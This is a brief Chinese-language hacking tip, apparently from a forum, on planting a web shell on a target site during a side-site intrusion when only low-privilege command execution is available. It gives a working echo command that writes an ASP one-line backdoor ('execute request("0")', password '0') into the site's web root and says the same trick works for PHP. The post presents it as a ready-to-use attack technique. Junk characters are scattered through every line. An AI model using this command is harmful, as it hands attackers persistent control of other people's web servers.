在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。( j, F" W! V8 m+ n
3 j5 p( M( N7 h$ N8 q# M命令格式 ~/ }( x% H9 m$ p) x
5 y& `$ P$ M9 p4 c9 \Echo 语句 >目标站绝对目录
" S3 F* q; A8 d' H' T) l( a4 ?" V# [! s( M
例如: - [6 u" C* j+ V1 i* j7 {
% _: P5 }+ w* ?" becho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp( ? p- b8 H# F& w6 N$ a8 w" a5 A
# E+ y) s4 P5 s* L$ J这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
T: M* I1 J! \0 K. d |